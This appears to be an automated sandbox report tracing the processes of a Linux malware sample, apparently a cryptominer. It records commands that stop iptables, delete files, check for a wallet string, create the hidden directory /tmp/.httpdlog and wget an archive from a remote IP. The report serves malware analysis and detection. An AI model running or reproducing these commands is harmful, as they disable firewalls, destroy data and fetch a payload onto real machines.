    Analysis Process: basename PID: 17730 Parent PID: 17728

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Chronological Activities

    Analysis Process: service PID: 17731 Parent PID: 17728

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17731 Parent PID: 17728

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl --quiet is-active multi-user.target
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17732 Parent PID: 17728

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: service PID: 17733 Parent PID: 17732

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17733 Parent PID: 17732

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl list-unit-files --full --type=socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17734 Parent PID: 17732

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: sed PID: 17734 Parent PID: 17732

    General

    Start time:10:49:10
    Start date:03/10/2018
    Path:/bin/sed
    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    File size:73424 bytes
    MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

    Chronological Activities

    Analysis Process: service PID: 17791 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17791 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show acpid.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17792 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17792 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show apport-forward.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17796 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17796 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show avahi-daemon.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17803 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17803 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show cups.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17823 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17823 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dbus.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17834 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17834 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dm-event.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17838 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17838 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmetad.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17847 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17847 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmpolld.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17858 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17858 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lxd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17865 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17865 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show saned.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17874 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17874 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show snapd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17883 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17883 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show ssh.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17895 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17895 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show syslog.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17903 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17903 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-bus-proxyd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17910 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17910 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-fsckd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17921 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17921 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-initctl.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17932 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17932 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-audit.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17941 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17941 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-dev-log.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17950 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17950 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17954 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17954 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-networkd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17961 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17961 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-rfkill.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17972 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17972 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-control.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17987 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17987 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-kernel.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: service PID: 17993 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Chronological Activities

    Analysis Process: systemctl PID: 17993 Parent PID: 17728

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show uuidd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: systemctl PID: 17728 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/systemctl
    Arguments:systemctl stop iptables.service
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Chronological Activities

    Analysis Process: bash PID: 18003 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: bash PID: 18007 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: bash PID: 18010 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: rm PID: 18010 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/rm
    Arguments:rm -f /tmp/httpdlog/*.gz
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Chronological Activities

    Analysis Process: bash PID: 18015 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: rm PID: 18015 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/rm
    Arguments:rm -f *.gz
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Chronological Activities

    Analysis Process: bash PID: 18020 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: rm PID: 18020 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/rm
    Arguments:rm -f *.sh
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Chronological Activities

    Analysis Process: bash PID: 18032 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: rm PID: 18032 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/rm
    Arguments:rm -f /tmp/L1fyFAYhE5
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Chronological Activities

    Analysis Process: bash PID: 18034 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: bash PID: 18040 Parent PID: 18034

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: ps PID: 18040 Parent PID: 18034

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/ps
    Arguments:ps -ef
    File size:97408 bytes
    MD5 hash:37339e5441057d422e61e8a471505337

    Chronological Activities

    Analysis Process: bash PID: 18041 Parent PID: 18034

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: grep PID: 18041 Parent PID: 18034

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/grep
    Arguments:grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Chronological Activities

    Analysis Process: bash PID: 18042 Parent PID: 18034

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: grep PID: 18042 Parent PID: 18034

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/grep
    Arguments:grep -v grep
    File size:211224 bytes
    MD5 hash:fc9b0a0ff848b35b3716768695bf2427

    Chronological Activities

    Analysis Process: bash PID: 18101 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: mkdir PID: 18101 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/mkdir
    Arguments:mkdir /tmp/.httpdlog
    File size:76848 bytes
    MD5 hash:a97f666f21c85ec62ea47d022263ef41

    Chronological Activities

    Analysis Process: bash PID: 18102 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/bin/bash
    Arguments:n/a
    File size:1037528 bytes
    MD5 hash:5e666695cf08d1638bb85684e30185ee

    Chronological Activities

    Analysis Process: wget PID: 18102 Parent PID: 17713

    General

    Start time:10:49:11
    Start date:03/10/2018
    Path:/usr/bin/wget
    Arguments:wget http://115.236.92.99:54321/mall.tar.gz
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Chronological Activities